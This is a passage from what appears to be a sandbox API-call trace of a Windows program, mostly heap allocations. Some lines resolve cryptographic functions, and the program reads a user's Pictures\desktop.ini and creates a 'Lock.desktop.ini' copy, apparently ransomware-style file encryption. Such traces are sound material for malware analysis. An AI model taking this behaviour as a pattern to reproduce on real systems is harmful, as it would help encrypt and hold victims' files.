0x2e51880 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0248.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0248.918] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69c28 [0248.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69c28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0248.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0248.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0248.920] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0248.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0248.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0248.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0248.920] CryptDestroyHash (hHash=0xa87390) returned 1 [0248.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0248.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0248.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0248.921] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.922] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0248.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.922] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0248.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0248.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.922] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0248.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.927] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0248.927] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0248.928] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0249.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0249.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0249.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0249.011] TranslateMessage (lpMsg=0x8cf708) returned 0 [0249.011] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0249.011] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0249.011] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0249.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0249.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0249.012] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e88 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0249.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0249.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e565a8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0249.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0249.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0249.015] HeapFree (in: hHeap=0x970000, 